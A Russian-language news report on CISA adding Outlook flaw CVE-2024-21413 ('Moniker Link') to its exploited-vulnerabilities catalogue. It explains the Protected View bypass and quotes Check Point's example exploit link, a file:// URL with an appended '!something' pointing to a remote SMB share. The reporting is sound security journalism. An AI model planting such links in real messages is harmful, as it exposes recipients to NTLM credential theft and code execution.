Представители Агентства по кибербезопасности и защите инфраструктуры США (CISA) предупредили, что федеральные ведомства должны до 27 февраля 2025 года защитить свои системы от продолжающихся атак, нацеленных на критическую уязвимость в Microsoft Outlook.
Речь идет об уязвимости CVE-2024-21413, которую в прошлом году обнаружили специалисты компании Check Point. Проблема затрагивает ряд продуктов Office, включая Microsoft Office LTSC 2021 и Microsoft 365 Apps for Enterprise, а также Microsoft Outlook 2016 и Microsoft Office 2019.
Ошибка приводит к удаленному выполнению кода при открытии писем с вредоносными ссылками при использовании уязвимой версии Microsoft Outlook. Дело в том, что баг позволяет обойти Protected View (механизм, предназначенный для блокировки вредоносного содержимого, встроенного в файлы Office, путем открытия в режиме только для чтения) и открывать вредоносные файлы Office в режиме редактирования.
В итоге атака может привести к краже учетных данных NTLM и выполнению произвольного кода с помощью вредоносных документов Office.
Исследователи предупреждали, что панель предварительного просмотра тоже может стать вектором атаки, так как эксплуатировать CVE-2024-21413 можно даже через предварительный просмотр вредоносных документов.
Аналитики Check Point назвали эту уязвимость Moniker Link и писали, что она позволяет обойти защиту Outlook от вредоносных ссылок, встроенных в электронные письма посредством file://. Нужно лишь добавить восклицательный знак к URL, который указывает на подконтрольные злоумышленникам серверы.
Восклицательный знак добавляется сразу после расширения документа вместе с произвольным текстом (в своем примере Check Point использовала слово «something»): *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*.
Такая ссылка обходит ограничения Outlook, и Outlook получает доступ к удаленному ресурсу \\\10.10.111.111\test\test.rtf при нажатии на ссылку, не отображая при этом никаких предупреждений или ошибок.
По словам исследователей, уязвимость связана с API MkParseDisplayName, поэтому может влиять и на другое ПО, которое его использует.
Как теперь сообщают представители CISA, уязвимость уже подвергается атаками и была внесена в каталог известных эксплуатируемых уязвимостей (Known Exploited Vulnerabilities, KEV).
«Подобные типы уязвимостей часто являются векторами атак со стороны злоумышленников и представляют значительные риски для федеральных организаций», — предупреждают в ведомстве.
